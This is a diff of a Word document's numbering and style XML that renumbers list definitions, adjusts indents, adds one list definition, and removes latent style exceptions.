     <w:lvl w:ilvl="5" w:tplc="040C001B" w:tentative="1">
@@ -19144,7 +18124,7 @@
       <w:lvlText w:val="%6."/>
       <w:lvlJc w:val="right"/>
       <w:pPr>
-        <w:ind w:left="5376" w:hanging="180"/>
+        <w:ind w:left="4665" w:hanging="180"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="6" w:tplc="040C000F" w:tentative="1">
@@ -19153,7 +18133,7 @@
       <w:lvlText w:val="%7."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="6096" w:hanging="360"/>
+        <w:ind w:left="5385" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="7" w:tplc="040C0019" w:tentative="1">
@@ -19162,7 +18142,7 @@
       <w:lvlText w:val="%8."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="6816" w:hanging="360"/>
+        <w:ind w:left="6105" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="8" w:tplc="040C001B" w:tentative="1">
@@ -19171,11 +18151,100 @@
       <w:lvlText w:val="%9."/>
       <w:lvlJc w:val="right"/>
       <w:pPr>
-        <w:ind w:left="7536" w:hanging="180"/>
+        <w:ind w:left="6825" w:hanging="180"/>
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10">
+    <w:nsid w:val="3FA858A4"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="D898B890"/>
+    <w:lvl w:ilvl="0" w:tplc="040C0017">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1776" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="040C0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2496" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="040C001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3216" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="040C000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3936" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="040C0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4656" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="040C001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="5376" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="040C000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6096" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="040C0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6816" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="040C001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="7536" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="11">
     <w:nsid w:val="4CFE63CA"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="1A9C37AA"/>
@@ -19288,7 +18357,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12">
     <w:nsid w:val="4F582193"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="8ABE1F90"/>
@@ -19401,7 +18470,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13">
     <w:nsid w:val="58143936"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="918C1E70"/>
@@ -19490,7 +18559,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14">
     <w:nsid w:val="58394DAD"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6E0ADD14"/>
@@ -19603,7 +18672,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15">
     <w:nsid w:val="64902A80"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="06A8AB92"/>
@@ -19692,7 +18761,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16">
     <w:nsid w:val="64E97AAB"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="78245ECE"/>
@@ -19781,7 +18850,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17">
     <w:nsid w:val="6810007B"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="252437A4"/>
@@ -19870,7 +18939,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18">
     <w:nsid w:val="6BB8375B"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="9704F4AC"/>
@@ -19983,7 +19052,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19">
     <w:nsid w:val="71744325"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="24A67088"/>
@@ -20096,7 +19165,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20">
     <w:nsid w:val="7CC3298B"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3236CB62"/>
@@ -20185,7 +19254,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="21">
     <w:nsid w:val="7D8408FB"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="8CC014EA"/>
@@ -20278,22 +19347,22 @@
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="15"/>
+    <w:abstractNumId w:val="16"/>
   </w:num>
   <w:num w:numId="3">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="4">
-    <w:abstractNumId w:val="20"/>
+    <w:abstractNumId w:val="21"/>
   </w:num>
   <w:num w:numId="5">
     <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="6">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
   </w:num>
   <w:num w:numId="7">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="18"/>
   </w:num>
   <w:num w:numId="8">
     <w:abstractNumId w:val="1"/>
@@ -20305,13 +19374,13 @@
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="11">
-    <w:abstractNumId w:val="19"/>
+    <w:abstractNumId w:val="20"/>
   </w:num>
   <w:num w:numId="12">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="13">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="14">
     <w:abstractNumId w:val="7"/>
@@ -20320,28 +19389,31 @@
     <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="16">
-    <w:abstractNumId w:val="18"/>
+    <w:abstractNumId w:val="19"/>
   </w:num>
   <w:num w:numId="17">
-    <w:abstractNumId w:val="13"/>
+    <w:abstractNumId w:val="14"/>
   </w:num>
   <w:num w:numId="18">
     <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="19">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="20">
     <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="21">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="13"/>
+  </w:num>
+  <w:num w:numId="22">
+    <w:abstractNumId w:val="9"/>
   </w:num>
 </w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
@@ -20357,382 +19429,640 @@
       </w:pPr>
     </w:pPrDefault>
   </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="375">
-    <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 3" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 4" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 5" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 6" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 7" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 8" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 9" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="index 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 9" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 1" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 2" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 3" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 4" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 5" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 6" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 7" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 8" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 9" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="header" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footer" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="caption" w:semiHidden="1" w:uiPriority="35" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="table of figures" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="envelope address" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="envelope return" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="line number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="page number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="endnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="endnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="table of authorities" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="macro" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toa heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Title" w:uiPriority="10" w:qFormat="1"/>
-    <w:lsdException w:name="Closing" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Message Header" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Subtitle" w:uiPriority="11" w:qFormat="1"/>
-    <w:lsdException w:name="Salutation" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Date" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text First Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text First Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Note Heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Block Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="FollowedHyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Strong" w:uiPriority="22" w:qFormat="1"/>
-    <w:lsdException w:name="Emphasis" w:uiPriority="20" w:qFormat="1"/>
-    <w:lsdException w:name="Document Map" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Plain Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="E-mail Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Top of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Bottom of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal (Web)" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Acronym" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Address" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Cite" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Code" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Definition" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Keyboard" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Preformatted" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Contemporary" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Elegant" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Professional" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid" w:semiHidden="1" w:uiPriority="59" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
-    <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
-    <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 1" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 1" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 1" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 1" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 1" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 1" w:uiPriority="65"/>
-    <w:lsdException w:name="Revision" w:semiHidden="1"/>
-    <w:lsdException w:name="List Paragraph" w:uiPriority="34" w:qFormat="1"/>
-    <w:lsdException w:name="Quote" w:uiPriority="29" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Quote" w:uiPriority="30" w:qFormat="1"/>
-    <w:lsdException w:name="Medium List 2 Accent 1" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 1" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 1" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 1" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 1" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 1" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 1" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 1" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 2" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 2" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 2" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 2" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 2" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 2" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 2" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 2" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 2" w:uiPriority="68"/>
